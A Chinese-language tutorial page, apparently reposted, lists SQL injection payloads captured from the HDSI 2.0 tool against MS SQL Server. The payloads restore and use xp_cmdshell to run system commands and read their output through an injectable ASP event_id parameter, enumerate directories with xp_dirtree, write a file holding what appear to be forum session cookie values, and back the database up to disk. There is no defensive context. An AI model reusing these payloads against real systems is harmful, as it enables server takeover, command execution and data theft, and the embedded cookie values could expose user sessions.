我要投稿
  • 您当前的位置:365bet官方 -> 技术教程 -> 网络安全教程 -> 教程内容
  • [ 收藏本页教程 ]
  • hdsi2.0 sql注入部分抓包(1)

    教程作者:佚名    教程来源:不详   教程栏目:网络安全教程    收藏本页
    hdsi2.0 sql注入部分抓包分析语句


    恢复cmd

    ;insert tb1 exec master..xp_cmdshell'net user '--

    ;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--


    执行命令:

    sql: ;ipconfig -all--

    dos:

    ;Drop table comd_list ;CREATE TABLE comd_list (ComResult nvarchar(1000)) INSERT comd_list EXEC MASTER..xp_cmdshell
    "ipconfig

    -all"--


    GET /plaza/event/new/crnt_event_view.asp?event_id=57

    And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [comd_list] Where 1=1)>0


    列目录:
    c:   jiaozhu 临时表

    ;drop table jiaozhu;CREATE TABLE jiaozhu(DirName VARCHAR(100), DirAtt VARCHAR(100),DirFile VARCHAR(100)) INSERT jiaozhu
    EXEC

    MASTER..XP_dirtree "c:",1,1--

    GET /plaza/event/new/crnt_event_view.asp?event_id=57

    And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [jiaozhu] Where 1=1)>0

    上传文件:

    本地路径:C:\Inetpub\wwwroot\cook.txt   保存位置:c:

    数据库存储过程:

    ;exec master..xp_cmdshell ' echo

    cdb_sid=3UrzOV;%20cdb_cookietime=2592000;%20cdb_auth=VgcCBAJbVQxVAVMCVghTBFJUUQYDBQdTV1BWVQoKAQE6PwNX;%
    20cdb_visitedfid=12;%2

    0cdb_oldtopics=D8D>c:\'--


    数据库备份:(上传后删除临时表)

    ;Drop table [xiaopan];create table [dbo].[xiaopan] ([cmd] [text])--

    ;insert into xiaopan(cmd) values(' echoStr ')--

    ;declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s='c:/' backup database @a to disk=@s WITH
    DIFFERENTIAL,FORMAT--

    ;Drop table [xiaopan]--

    我要投稿   -   广告合作   -   关于本站   -   友情连接   -   网站地图   -   联系我们   -   版权声明   -   设为首页   -   加入收藏   -   网站留言
    Copyright © 2009 - 20012 www.www.ct131.com All Rights Reserved.365bet官方 版权所有